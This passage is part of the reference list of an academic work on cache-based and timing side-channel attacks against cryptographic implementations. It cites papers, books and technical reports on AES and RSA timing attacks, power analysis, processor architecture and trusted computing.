Channel Cryptanalysis of Product Ciphers. Journal of Computer Security, volume 8, pages 141-158, 2000. [55] N. S. Kim, T. Austin, T. Mudge, and D. Grunwald. Challenges for architectural level power modeling. Power-Aware Computing, R. Melhem and R.Graybill, editors, 2001. [56] N. Koblitz. A Course in Number Theory and Cryptography (Graduate Texts in Mathematics). Springer, 1994 [57] Ç. K. Koç. High-Speed RSA Implementation. TR 201, RSA Laboratories, 73 pages, November 1994. [58] Ç. K. Koç. RSA Hardware Implementation. TR 801, RSA Laboratories, 30 pages, April 1996. 158 [59] P. C. Kocher. Timing Attacks on Implementations of Diffie–Hellman, RSA, DSS, and Other Systems. Advances in Cryptology - CRYPTO ’96, N. Koblitz, editor, pages 104-113, Springer-Verlag, Lecture Notes in Computer Science series 1109, 1996. [60] P. C. Kocher, J. Jaffe, B. Jun. Differential Power Analysis. Advances in Cryptology - CRYPTO ’99, M. Wiener, editor, pages 388-397, SpringerVerlag, Lecture Notes in Computer Science series 1666, 1999. [61] F. Koeune, J. J. Quisquater. A Timing Attack against Rijndael. Technical Report CG-1999/1, June 1999. [62] C. Lauradoux. Collision attacks on processors with cache and countermeasures. Western European Workshop on Research in Cryptology — WEWoRC 2005, C. Wolf, S. Lucks, and P.-W. Yau, editors, pages 76-85, 2005. [63] M. Matsui. New Block Encryption Algorithm MISTY. Proceedings of the 4th International Workshop on Fast Software Encryption, G. Goos, J. Hartmanis and J. van Leeuwen, editors, pages 54-68, Springer-Verlag, Lecture Notes in Computer Science series 1267, 1997. [64] A. J. Menezes, P. van Oorschot, and S. Vanstone. Handbook of Applied Cryptography. CRC Press, New York, 1997. [65] M. Milenkovic, A. Milenkovic, and J. Kulick. Microbenchmarks for Determining Branch Predictor Organization. Software Practice & Experience, volume 34, issue 5, pages 465-487, April 2004. [66] M. Neve. Cache-based Vulnerabilities and SPAM Analysis. Ph.D. Thesis, Applied Science, UCL, July 2006 [67] M. Neve and J.-P. Seifert. Advances on Access-driven Cache Attacks on AES. Selected Areas of Cryptography — SAC’06, to appear. [68] M. Neve, J.-P. Seifert, Z. Wang. A refined look at Bernstein’s AES sidechannel analysis. Proceedings of ACM Symposium on Information, Computer and Communications Security — ASIACCS’06, to appear, Taipei, Taiwan, March 21-24, 2006. [69] P. Q. Nguyen and I. E. Shparlinski. The Insecurity of the Digital Signature Algorithm with Partially Known Nonces. Journal of Cryptology, Volume 15, Issue 3, pages 151-176, Springer, 2002. [70] P. Q. Nguyen and I. E. Shparlinski. The Insecurity of the Elliptic Curve Digital Signature Algorithm with Partially Known Nonces. Design, Codes and Cryptography, Volume 30, pages 201-217, 2003. 159 [71] Openssl: the open-source toolkit for ssl/tls. Available at: http://www.openssl.org/. [72] D. A. Osvik, A. Shamir, and E. Tromer. Other People’s Cache: Hyper Attacks on HyperThreaded Processors. Presentation available at: http://www.wisdom.weizmann.ac.il/∼tromer/. [73] D. A. Osvik, A. Shamir, and E. Tromer. Cache Attacks and Countermeasures: The Case of AES. Topics in Cryptology — CT-RSA 2006, The Cryptographers’ Track at the RSA Conference 2006, D. Pointcheval, editor, pages 1-20, Springer-Verlag, Lecture Notes in Computer Science series 3860, 2006 [74] R. van der Pas. Memory Hierarchy in Cache-Based Systems. Technical Report, Sun Microsystems Inc., 28 pages, 2002. Available at: http://www.sun.com/blueprints/1102/817-0742.pdf [75] D. Page. Theoretical Use of Cache Memory as a Cryptanalytic Side-Channel. Technical Report CSTR-02-003, Department of Computer Science, University of Bristol, June 2002. [76] D. Page. Defending Against Cache Based Side-Channel Attacks. Technical Report. Department of Computer Science, University of Bristol, 2003. [77] D. Page. Partitioned Cache Architecture as a Side Channel Defence Mechanism. Cryptography ePrint Archive, Report 2005/280, August 2005. [78] D. Patterson and J. Hennessy. Computer Architecture: A Quantitative Approach. 4th edition, Morgan Kaufmann, 2006. [79] S. Pearson. Trusted Computing Platforms: TCPA Technology in Context, Prentice Hall PTR, 2002. [80] C. Percival. Cache missing for fun and profit. BSDCan 2005, Ottawa, 2005. Available at: http://www.daemonology.net/hyperthreading-consideredharmful/ [81] C. P. Pfleeger and S. L. Pfleeger. Security in Computing. 3rd edition, Prentice Hall PTR, 2002. [82] R.L. Rivest, A. Shamir, L.M. Adleman. A Method for Obtaining Digital Signatures and Public-key Cryptosystems. Communications of the ACM, volume 21, pages 120-126, 1978. [83] E. Rotenberg, S. Benett, and J. E. Smith. Trace cache: a low latency approach to high bandwidth instruction fetching.Proceedings of the 29th Annual ACM/IEEE Intl. Symposium on Microarchitecture, pages 24-34, 1996. 160 [84] RSA Laboratories. PKCS #1 v2.1: RSA Encryption Standard. June 2002. Available at: ftp://ftp.rsasecurity.com/pub/pkcs/pkcs-1/pkcs-1v2-1.pdf. [85] W. Schindler. A Timing Attack against RSA with the Chinese Remainder Theorem. Cryptographic Hardware and Embedded Systems — CHES 2000, Ç.K. Koç and C. Paar, editors, pages 110–125, Springer-Verlag, Lecture Notes in Computer Science series 1965, 2000. [86] W. Schindler. Optimized Timing Attacks against Public Key Cryptosystems. Statistics and Decisions, volume 20, pages 191-210, 2002. [87] W. Schindler. On the Optimization of Side-Channel Attacks by Advanced Stochastic Methods. Public Key Cryptography — PKC 2005, S. Vaudenay, editor, pages 85-103, Springer-Verlag, Lecture Notes in Computer Science series 3386, 2005. [88] W. Schindler, F. Koeune, and J.-J. Quisquater. Improving Divide and Conquer Attacks Against Cryptosystems by Better Error Detection / Correction Strategies. Cryptography and Coding — IMA 2001, B. Honary, editor, pages 245-267, Springer-Verlag, Lecture Notes in Computer Science series 2260, 2001. [89] W. Schindler, F. Koeune, J.-J. Quisquater. Unleashing the Full Power of Timing Attack. Technical Report CG-2001/3, Universite Catholique de Louvain, 2001. [90] B. Schneier. Applied Cryptography: Protocols, Algorithms, and Source Code in C. John Waley & sons, 1996 [91] T. Shanley. The Unabridged Pentium 4 : Addison-Wesley Professional, 2004. IA32 Processor Genealogy. [92] J. Shen and M. Lipasti. Modern Processor Design: Fundamentals of Superscalar Processors. McGraw-Hill, 2005. [93] A. Silberschatz, G. Gagne, and P. B. Galvin. Operating system concepts. 7th edition, John Wiley and Sons, 2005. [94] S. W. Smith. Trusted Computing Platforms: Design and Applications, Springer-Verlag, 2004. [95] O. Sibert, P. A. Porras, and R. Lindell. The Intel 80x86 Processor Architecture: Pitfalls for Secure Systems. IEEE Symposium on Security and Privacy, pages 211-223, 1995. 161 [96] W. Stallings. Cryptography and Network Security: Principles and Practice. 3rd Edition, Prentice Hall, 2002 [97] D. R. Stinson. Cryptography: Theory and Practice. 2nd Edition, CRC Press, 2002 [98] H. C. A. van Tilborg. Encyclopedia of Cryptography and Security. Springer, 2005 [99] Trusted Computing Group, http://www.trustedcomputinggroup.org. [100] Y. Tsunoo, T.Saito, T. Suzaki, M. Shigeri, H. Miyauchi. Cryptanalysis of DES Implemented on Computers with Cache. Cryptographic Hardware and Embedded Systems — CHES 2003, C. D. Walter, Ç. K. Koç, and C. Paar, editors, pages 62-76, Springer-Verlag, Lecture Notes in Computer Science series 2779, 2003. [101] Y. Tsunoo, E. Tsujihara, K. Minematsu, H. Miyauchi. Cryptanalysis of Block Ciphers Implemented on Computers with Cache. ISITA 2002, 2002. [102] Y. Tsunoo, E. Tsujihara, M. Shigeri, H. Kubo, K. Minematsu. Improving cache attacks by considering cipher structure. International Journal of Information Security, volume 5, issue 3, pages 166-176, Springer-Verlag, 2006. [103] R. Uhlig, G. Neiger, D. Rodgers, A. L. Santoni, F. C. M. Martins, A. V. Anderson, S. M. Bennett, A. Kagi, F. H. Leung, L. Smith. Intel Virtualization Technology, IEEE Computer, volume 38, issue 5, pages 48-56, May 2005. [104] S. Vaudenay. A Classical Introduction to Cryptography: Applications for Communications Security . Springer, 2005 [105] C. D. Walter. Montgomery Exponentiation Needs No Final Subtractions. IEE Electronics Letters, volume 35, issue 21, pages 1831-1832, October 1999. [106] W. Ware. Security Controls for Computer Systems. Report of Defense Science Board Task Force on Computer Security; Rand Report R609-1, The RAND Corporation, 1970.